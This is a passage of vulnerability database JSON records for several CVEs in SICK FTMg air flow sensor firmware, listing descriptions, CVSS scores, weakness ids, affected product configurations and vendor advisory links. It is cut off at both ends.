erator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"crite
ria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23446","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.160","lastModified":"2026-06-01T13:16:22.957","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in SICK FTMg AIR FLOW SENSOR with Partnumbers\n1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged remote attacker to download files by using a therefore unpriviledged account via the REST 
interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"op
erator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"crite
ria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23447","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.217","lastModified":"2026-06-01T13:16:23.123","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged\nremote attacker to influence the availability of the webserver by invocing several open file requests via\nthe REST 
interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"op
erator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"crite
ria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23448","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.280","lastModified":"2026-06-01T13:16:23.287","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Inclusion of Sensitive Information in Source Code in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows a\nremote attacker to gain information about valid usernames via analysis of source 
code."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-540"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-668"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"opera
tor":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria
":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23449","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.347","lastModified":"2026-06-01T13:16:23.467","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Observable Response Discrepancy in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows a remote attacker\nto gain information about valid usernames by analyzing challenge responses from the server via the\nREST 
interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-204"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-203"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"
operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"cri
teria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-23450","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.407","lastModified":"2026-06-01T13:16:23.607","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Use of Password Hash Instead of Password for Authentication in SICK FTMg AIR\nFLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526\nallows an unprivileged remote attacker to use a password hash instead of an actual password to login\nto a valid user account via the REST 
